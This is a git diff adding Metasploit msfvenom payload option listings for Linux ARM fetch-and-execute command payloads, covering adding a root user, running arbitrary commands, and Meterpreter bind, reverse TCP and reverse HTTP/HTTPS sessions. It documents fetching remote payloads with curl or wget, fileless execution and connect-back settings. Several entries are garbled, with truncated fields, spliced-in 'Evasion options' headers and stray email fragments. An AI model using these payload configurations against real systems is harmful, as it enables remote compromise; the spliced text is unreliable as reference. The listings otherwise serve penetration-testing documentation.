+Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command to execute. +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ftrEeBVpS no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-adduser.txt b/msfvenom/payload_options/cmd-linux-http-armle-adduser.txt new file mode 100644 index 0000000..f8a30c9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-adduser.txt @@ -0,0 +1,70 @@ + + Name: HTTP Fetch, Linux Add User + Module: payload/cmd/linux/http/armle/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CXQGzVAHjB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-exec.txt b/msfvenom/payload_options/cmd-linux-http-armle-exec.txt new file mode 100644 index 0000000..bebfb8a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-exec.txt @@ -0,0 +1,68 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/armle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RehdCjIlUXKQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..a145fca --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-bind_tcp.txt @@ -0,0 +1,96 @@ + + Name: HTTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/http/armle/meterpreter/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jXmsYyvUo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..82e41f7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-reverse_tcp.txt @@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/armle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Nor +Evasion options for payload/cmd/linux/http/armle/meterpreter/reverse_tcp: +========================= + + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NElxiOYcd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..23d34ed --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_http: +========================= + +cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XnlZncyaIRhL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..d77f1c8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_https: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wAhDSkfiYAV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..fe3deca --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eOJorghpY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes 